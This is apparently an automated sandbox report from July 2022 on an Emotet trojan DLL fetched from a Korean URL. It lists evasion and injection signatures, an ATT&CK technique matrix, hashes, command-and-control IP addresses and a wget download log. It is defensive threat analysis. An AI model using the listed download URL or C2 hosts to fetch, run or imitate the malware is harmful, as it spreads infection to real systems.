                      Source: regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: svchost.exe, 00000010.00000002.649151434.000001FBD6402000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
                      Source: wget.exe, 00000002.00000002.382696287.0000000000B78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000010.00000002.649217359.000001FBD6428000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180046AFC IsDebuggerPresent,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018003588C GetProcessHeap,
                      Source: C:\Windows\System32\loaddll64.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000218C SetUnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001A30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028DE4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001FA4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 45.55.191.130 443
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 213.239.212.5 443
                      Source: C:\Windows\System32\loaddll64.exeSection loaded: C:\Users\user\Desktop\download\NjszMzh0ar.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\download\NjszMzh0ar.dll",#1
                      Source: C:\Windows\SysWOW64\wget.exeQueries volume information: C:\Users\user\Desktop\download VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                      Source: C:\Windows\System32\regsvr32.exeCode function: GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800280B0 cpuid
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000239C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000008.00000002.649302129.0000000000578000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 5.2.regsvr32.exe.14a0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.292f30b0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.14a0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.rundll32.exe.292f30b0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.450000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.450000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1ea80010000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.1ea80010000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000007.00000002.397283581.00000292F30B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.400285901.00000000014A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.649181292.0000000000491000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.395347211.000001EA80041000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.395275821.000001EA80010000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.400314253.00000000014D1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.649048864.0000000000450000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.397309936.00000292F30E1000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation11
                      DLL Side-Loading
                      111
                      Process Injection
                      21
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
                      DLL Side-Loading
                      1
                      Virtualization/Sandbox Evasion
                      LSASS Memory131
                      Security Software Discovery
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth14
                      Ingress Tool Transfer
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)111
                      Process Injection
                      Security Account Manager1
                      Virtualization/Sandbox Evasion
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Deobfuscate/Decode Files or Information
                      NTDS2
                      Process Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer114
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Hidden Files and Directories
                      LSA Secrets1
                      Remote System Discovery
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Obfuscated Files or Information
                      Cached Domain Credentials2
                      File and Directory Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Regsvr32
                      DCSync34
                      System Information Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)11
                      DLL Side-Loading
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
                      File Deletion
                      Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 670809 URL: http://clotizen.dothome.co.... Startdate: 21/07/2022 Architecture: WINDOWS Score: 100 47 80.100.90.0 XS4ALL-NLAmsterdamNL Netherlands 2->47 49 74.211.2.0 TDS-ASUS United States 2->49 51 23 other IPs or domains 2->51 59 Snort IDS alert for network traffic 2->59 61 Antivirus detection for URL or domain 2->61 63 Antivirus / Scanner detection for submitted sample 2->63 65 5 other signatures 2->65 8 loaddll64.exe 1 2->8         started        11 cmd.exe 2 2->11         started        13 svchost.exe 2->13         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 69 DLL side loading technique detected 8->69 18 regsvr32.exe 5 8->18         started        22 cmd.exe 1 8->22         started        24 rundll32.exe 8->24         started        31 2 other processes 8->31 26 wget.exe 2 11->26         started        29 conhost.exe 11->29         started        55 192.168.2.1 unknown unknown 13->55 signatures6 process7 dnsIp8 39 C:\Windows\System32\...\VycaGa.dll (copy), PE32+ 18->39 dropped 67 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->67 33 regsvr32.exe 12 18->33         started        37 rundll32.exe 22->37         started        53 clotizen.dothome.co.kr 112.175.184.78, 49742, 80 KIXS-AS-KRKoreaTelecomKR Korea Republic of 26->53 41 C:\Users\user\Desktop\...41jszMzh0ar.dll, PE32+ 26->41 dropped file9 signatures10 process11 dnsIp12 43 213.239.212.5, 443, 49779 HETZNER-ASDE Germany 33->43 45 45.55.191.130, 443, 49776 DIGITALOCEAN-ASNUS United States 33->45 57 System process connects to network (likely due to code injection or exploit) 33->57 signatures13

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV17%VirustotalBrowse
                      http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV100%Avira URL Cloudmalware
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\download\NjszMzh0ar.dll85%ReversingLabsWin64.Trojan.Emotet
                      C:\Windows\System32\QKXGFEEVVr\VycaGa.dll (copy)85%ReversingLabsWin64.Trojan.Emotet
                      SourceDetectionScannerLabelLinkDownload
                      7.2.rundll32.exe.292f30b0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      8.2.regsvr32.exe.450000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      6.2.rundll32.exe.1ea80010000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      5.2.regsvr32.exe.14a0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8100%Avira URL Cloudmalware
                      https://45.55.191.130/0%URL Reputationsafe
                      https://213.239.212.5/100%Avira URL Cloudmalware
                      http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/100%Avira URL Cloudmalware
                      https://213.239.212.5/D100%Avira URL Cloudmalware
                      https://45.55.191.130/%I:100%Avira URL Cloudmalware
                      https://45.55.191.130/;100%Avira URL Cloudmalware
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      clotizen.dothome.co.kr
                      112.175.184.78
                      truefalse
                        unknown
                        NameMaliciousAntivirus DetectionReputation
                        https://45.55.191.130/true
                        • URL Reputation: safe
                        unknown
                        https://213.239.212.5/true
                        • Avira URL Cloud: malware
                        unknown
                        http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/true
                        • Avira URL Cloud: malware
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/8wget.exe, 00000002.00000002.382757981.0000000001195000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://213.239.212.5/Dregsvr32.exe, 00000008.00000003.471351504.0000000000605000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649652477.0000000000605000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://45.55.191.130/%I:regsvr32.exe, 00000008.00000003.471389369.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.467241295.0000000000639000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000002.649762809.000000000063F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471509754.000000000063D000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://45.55.191.130/;regsvr32.exe, 00000008.00000002.649517478.00000000005DB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471413003.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000008.00000003.471552256.00000000005DA000.00000004.00000020.00020000.00000000.sdmptrue
                        • Avira URL Cloud: malware
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        112.175.184.78
                        clotizen.dothome.co.krKorea Republic of
                        4766KIXS-AS-KRKoreaTelecomKRfalse
                        112.194.0.0
                        unknownChina
                        4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNtrue
                        80.100.90.0
                        unknownNetherlands
                        3265XS4ALL-NLAmsterdamNLtrue
                        192.3.0.0
                        unknownUnited States
                        36352AS-COLOCROSSINGUStrue
                        74.211.2.0
                        unknownUnited States
                        4181TDS-ASUStrue
                        45.55.191.130
                        unknownUnited States
                        14061DIGITALOCEAN-ASNUStrue
                        213.239.212.5
                        unknownGermany
                        24940HETZNER-ASDEtrue
                        4.4.0.0
                        unknownUnited States
                        3356LEVEL3UStrue
                        232.3.0.0
                        unknownReserved
                        unknownunknowntrue
                        208.109.90.0
                        unknownUnited States
                        26496AS-26496-GO-DADDY-COM-LLCUStrue
                        222.94.0.0
                        unknownChina
                        4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                        20.4.0.0
                        unknownUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                        215.219.2.0
                        unknownUnited States
                        721DNIC-ASBLK-00721-00726UStrue
                        68.211.2.0
                        unknownUnited States
                        6389BELLSOUTH-NET-BLKUStrue
                        208.100.90.0
                        unknownUnited States
                        32440LONIUStrue
                        16.101.90.0
                        unknownUnited States
                        unknownunknowntrue
                        70.211.2.0
                        unknownUnited States
                        6167CELLCO-PARTUStrue
                        32.4.0.0
                        unknownUnited States
                        2686ATGS-MMD-ASUStrue
                        67.211.2.0
                        unknownUnited States
                        35985ONERINGNET-ATL-1UStrue
                        4.1.0.0
                        unknownUnited States
                        3356LEVEL3UStrue
                        36.4.0.0
                        unknownChina
                        4134CHINANET-BACKBONENo31Jin-rongStreetCNtrue
                        236.3.0.0
                        unknownReserved
                        unknownunknowntrue
                        16.4.0.0
                        unknownUnited States
                        unknownunknowntrue
                        96.92.0.0
                        unknownUnited States
                        7922COMCAST-7922UStrue
                        208.99.90.0
                        unknownUnited States
                        30361SWIFTWILL2UStrue
                        56.211.2.0
                        unknownUnited States
                        2686ATGS-MMD-ASUStrue
                        72.211.2.0
                        unknownUnited States
                        22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                        16.100.90.0
                        unknownUnited States
                        unknownunknowntrue
                        IP
                        192.168.2.1
                        Joe Sandbox Version:35.0.0 Citrine
                        Analysis ID:670809
                        Start date and time: 21/07/202206:50:382022-07-21 06:50:38 +02:00
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 33s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Cookbook file name:urldownload.jbs
                        Sample URL:http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:26
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.evad.win@22/3@1/29
                        EGA Information:
                        • Successful, ratio: 100%
                        HDC Information:
                        • Successful, ratio: 85.1% (good quality ratio 77.6%)
                        • Quality average: 69.5%
                        • Quality standard deviation: 31.7%
                        HCA Information:
                        • Successful, ratio: 99%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe
                        • TCP Packets have been reduced to 100
                        • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.152.110.14, 20.54.89.106
                        • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        No simulations
                        No context
                        No context
                        No context
                        No context
                        No context
                        Process:C:\Windows\SysWOW64\cmd.exe
                        File Type:ASCII text, with CRLF line terminators
                        Category:modified
                        Size (bytes):1453
                        Entropy (8bit):3.8323406521429297
                        Encrypted:false
                        SSDEEP:12:HDUAKXXQB1De5RhKofybvVK+1X+IAqgaD4hMyw1uAizumxu8SjDGzd1VuivVK+eb:gAKQBxePgVV4MgakL3/G86A1kEVKb
                        MD5:61E2422DB49AEED45E7FD6C3CE082F14
                        SHA1:449B97C84BE860AFBE4F9CBFB4D720AEB15C8E3C
                        SHA-256:DB82C53FE1657B54EF2819A5823F2F76BC785CE59B439FDEA4D9F14D16D04329
                        SHA-512:82A08AC0D530252CE7A04420A0A7D97E544A20116088E535C3929F639EF286F077F65637349945D4D69E8E36F818DDE28D7735AABE2A90406551B27F0014E0E9
                        Malicious:false
                        Reputation:low
                        Preview:--2022-07-21 06:51:52-- http://clotizen.dothome.co.kr/members/lZTkIb3OkjcV/..Resolving clotizen.dothome.co.kr (clotizen.dothome.co.kr)... 112.175.184.78..Connecting to clotizen.dothome.co.kr (clotizen.dothome.co.kr)|112.175.184.78|:80... connected...HTTP request sent, awaiting response... 200 OK..Length: 574464 (561K) [application/x-msdownload]..Saving to: 'C:/Users/user/Desktop/download/NjszMzh0ar.dll'.... 0K .......... .......... .......... .......... .......... 8% 94.8K 5s.. 50K .......... .......... .......... .......... .......... 17% 184K 4s.. 100K .......... .......... .......... .......... .......... 26% 177K 3s.. 150K .......... .......... .......... .......... .......... 35% 205K 2s.. 200K .......... .......... .......... .......... .......... 44% 192K 2s.. 250K .......... .......... .......... .......... .......... 53% 1.37M 1s.. 300K .......... .......... .......... .......... .......... 62% 490K 1s.. 350K .......... .......... .......... .....
                        Process:C:\Windows\SysWOW64\wget.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):574464
                        Entropy (8bit):7.05018605197853
                        Encrypted:false
                        SSDEEP:12288:J3g9D58uw5aB6XwKkdTtIoiNWBrr5gYzGqhFfyFjVw:1WD5T1dTtgWBr1Zqo
                        MD5:5CA77376584324B3C4A433F1E27CC7D0
                        SHA1:4E1252CF241E0861CFDDC0880C7BE86970512D96
                        SHA-256:126DF8666ACE477023E97CA07F08E6C39774F382B1854BB62C39294ADE85C4C1
                        SHA-512:22ECDE635099331001E71DCC78CA69FFD0EEF92D78956DD6D99E7222DD44FF01F8B6E9F8F88EB3221FCA8186D172790F6A0D1A0A3648278720BCE49B4D706ED7
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 85%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.U..U..U..x'..U..x'...U..x'..U... ..U... ..U... ..U..x'..U..U...U..j ..U..j ..U..j b.U..U..U..j ..U..Rich.U..........PE..d...3b.b.........." .........................................................0............ .....................................................P............@..|8........... ......`...................................8............................................text............................... ..`.rdata..............................@..@.data....(..........................@....pdata..|8...@...:..................@..@_RDATA...............0..............@..@.rsrc................2..............@..@.reloc....... ......................@..B................................................................................................................................................................................................
                        Process:C:\Windows\System32\regsvr32.exe
                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):574464
                        Entropy (8bit):7.05018605197853
                        Encrypted:false
                        SSDEEP:12288:J3g9D58uw5aB6XwKkdTtIoiNWBrr5gYzGqhFfyFjVw:1WD5T1dTtgWBr1Zqo
                        MD5:5CA77376584324B3C4A433F1E27CC7D0
                        SHA1:4E1252CF241E0861CFDDC0880C7BE86970512D96
                        SHA-256:126DF8666ACE477023E97CA07F08E6C39774F382B1854BB62C39294ADE85C4C1
                        SHA-512:22ECDE635099331001E71DCC78CA69FFD0EEF92D78956DD6D99E7222DD44FF01F8B6E9F8F88EB3221FCA8186D172790F6A0D1A0A3648278720BCE49B4D706ED7
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 85%
                        Reputation:low
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........4.U..U..U..x'..U..x'...U..x'..U... ..U... ..U... ..U..x'..U..U...U..j ..U..j ..U..j b.U..U..U..j ..U..Rich.U..........PE..d...3b.b.........." .........................................................0............ .....................................................P............@..|8........... ......`...................................8............................................text............................... ..`.rdata..............................@..@.data....(..........................@....pdata..|8...@...:..................@..@_RDATA...............0..............@..@.rsrc................2..............@..@.reloc....... ......................@..B................................................................................................................................................................................................
                        No static file info
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        192.168.2.645.55.191.130497764432404334 07/21/22-06:52:35.157478TCP2404334ET CNC Feodo Tracker Reported CnC Server TCP group 1849776443192.168.2.645.55.191.130
                        192.168.2.6213.239.212.5497794432404326 07/21/22-06:52:37.822577TCP2404326ET CNC Feodo Tracker Reported CnC Server TCP group 1449779443192.168.2.6213.239.212.5
                        TimestampSource PortDest PortSource IPDest IP
                        Jul 21, 2022 06:51:53.898060083 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.160588026 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.160720110 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.164777040 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.429169893 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443196058 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443223953 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443308115 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443314075 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.443437099 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443495989 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.443550110 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443628073 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443675041 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.443753004 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443867922 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.443916082 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.443948030 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.444067955 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.444124937 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.705842972 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.705909967 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.705935001 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706049919 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706057072 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.706101894 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.706161022 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706310987 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706365108 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.706367970 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706491947 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706541061 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.706614971 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706686020 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706737041 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.706847906 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.706964016 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.707034111 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.707091093 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.707114935 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.707176924 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.707226038 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.851440907 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.968970060 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969007969 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969077110 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.969094038 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969201088 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969244957 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.969291925 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969372034 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969430923 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.969495058 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969616890 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969664097 CEST4974280192.168.2.6112.175.184.78
                        Jul 21, 2022 06:51:54.969729900 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969899893 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969922066 CEST8049742112.175.184.78192.168.2.6
                        Jul 21, 2022 06:51:54.969960928 CEST4974280192.168.2.6112.175.184.78
